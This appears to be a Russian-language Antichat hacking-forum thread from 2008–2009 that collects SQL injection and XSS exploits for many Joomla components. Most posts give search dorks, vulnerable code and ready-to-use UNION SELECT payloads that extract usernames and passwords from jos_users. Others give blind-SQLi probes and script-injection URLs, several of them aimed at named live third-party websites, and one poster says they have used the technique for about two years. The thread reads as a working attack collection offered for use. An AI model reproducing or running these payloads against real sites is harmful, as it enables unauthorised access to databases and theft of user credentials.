Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

14.12.2008, 15:39
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Joomla Component Userlist SQL-INJ
Уязвимый продукт: Joomla Component Userlist
Версия: 2.5 (в более ранних версиях не прокатывает - другой запрос)
Дорк: "inurl:com_userlist"
SQL-INJ
Необходимое условие: magic_quotes_gpc = Off
Уязвимость в файле userlist.php.
Уязвимый кусок кода:
PHP код:
if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
Параметр $search не фильтруется, но обрамляется в кавычки, значит без ковычек тут не обойтись.
Эксплуатация:
В поле поиска пользователя вбиваем следующее:
Код:
1' and 1=2) and 1=2 union select 1,2,3,4,5,6-- 1
Получаем логин и пароль:
Код:
1' and 1=2) and 1=2 union select concat(username,char(58),password),2,3,4,5,6 from jos_users-- 1
Уязвимости предыдущих версий:
Код:
Версия 2.0 SQL-INJ /index.php?option=com_userlist&limitstart=0,0+union+select+1,2,3,4--+1
Последний раз редактировалось Grey; 14.12.2008 в 18:19..
|
|
|

14.12.2008, 23:04
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Joomla Component Productbook Blind-SQL
Уязвимый продукт: Joomla Component Productbook
Версия: 1.0.4
Дорк: "inurl:com_productbook"
Blind SQL-INJ
Уязвимость в файле productbook.php.
Уязвимый кусок кода:
PHP код:
$database->setQuery("SELECT a.*, cc.name AS category "
. " \n FROM #__productbook AS a, #__productbook_catg AS cc "
. " \n WHERE a.catid=cc.cid AND a.id=$id "
. " \n AND cc.access<='$gid'");
Exploit:
Код:
true: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=1
false: /index.php?option=com_productbook&Itemid=97&func=detail&id=351+and+and+1=2
Example:
Код:
true: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=5
false: http://www.jovani.com/index.php?option=com_productbook&func=detail&Itemid=7&id=10153+and+substring(version(),1,1)=4
__________________
Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 14.12.2008 в 23:07..
|
|
|
XSS в модуле com_frontpage в параметре fontstyle. |

19.12.2008, 18:24
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме: 536527
Репутация:
62
|
|
XSS в модуле com_frontpage в параметре fontstyle.
Код:
Код:
/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Примеры:
Код:
http://www.l2hell.ru/index.php?option=com_frontpage&Itemid=1&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
Код:
http://uasos.com/index.php?Itemid=1&limit=14&limitstart=10696&option=com_frontpage&fontstyle=%22%3E%3Cscript%3Ealert(/Xa-xa/)%3C/script%3E
|
|
|

22.12.2008, 02:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме: 1246854
Репутация:
622
|
|
Уязвимый продукт: Joomla Component Extcalendar
Дорк: "inurl:com_extcalendar"
Код:
http://[target]/[path]/components/com_extcalendar/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
Таже бага тока в новой упаковке
Уязвимый продукт: Joomla Component JCalPro
Дорк: "inurl:com_jcalpro"
Код:
http://[target]/[path]/components/com_jcalpro/cal_popup.php?extmode=view&extid=0'+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
PS юзаю почти 2 года
|
|
|
Joomla Component com_hbssearch(r_type) Blind SQL-injection |

22.12.2008, 16:52
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме: 3659973
Репутация:
466
|
|
Joomla Component com_hbssearch(r_type) Blind SQL-injection
Joomla Component com_hbssearch(r_type) Blind SQL-injection
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetai ls&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->FALSE
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->TRUE
# milw0rm.com [2008-12-21]
Joomla Component com_tophotelmodule(id) Blind SQL-injection
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE
# milw0rm.com [2008-12-21]
Последний раз редактировалось Rubaka; 22.12.2008 в 16:55..
|
|
|

24.12.2008, 02:32
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7568
:::::::
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
____________
http://www.milw0rm.com/exploits/7567
|
|
|

25.12.2008, 00:36
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7572
::::
Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln
_________
http://www.milw0rm.com/exploits/7573
:::::
Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln
__________
http://www.milw0rm.com/exploits/7574
:::::
Joomla Component 5starhotels (id) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7575
Последний раз редактировалось swt1; 25.12.2008 в 00:41..
|
|
|

05.01.2009, 23:54
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме: 3370466
Репутация:
96
|
|
Joomla com_phocadocumentation (id) Remote SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7670
:::::
Joomla com_na_newsdescription (newsid) SQL Injection Exploit
__________
http://www.milw0rm.com/exploits/7669
:::::
__________
Joomla Component simple_review 1.x SQL Injection Vulnerability
:::::
http://www.milw0rm.com/exploits/7667
Последний раз редактировалось swt1; 05.01.2009 в 23:57..
|
|
|

10.01.2009, 18:17
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме: 5111568
Репутация:
2399
|
|
Компонент ReMOSitory 341RE (com_remository)
XSS
/index.php?option=com_remository&Itemid=1&func=sele ct_XSS&
Пример:
http://studik.lviv.ua/index.php?option=com_remository&Itemid=44&func=sel ect_<img src="" onerror=alert('xss') xxx&id=1&orderby=2&page=2
|
|
|

14.01.2009, 10:08
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Двиг: Joomla
Компонент: com_gigcal(gigcal_gigs_id)
Уязвимость: SQL-injection
Код:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id='+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|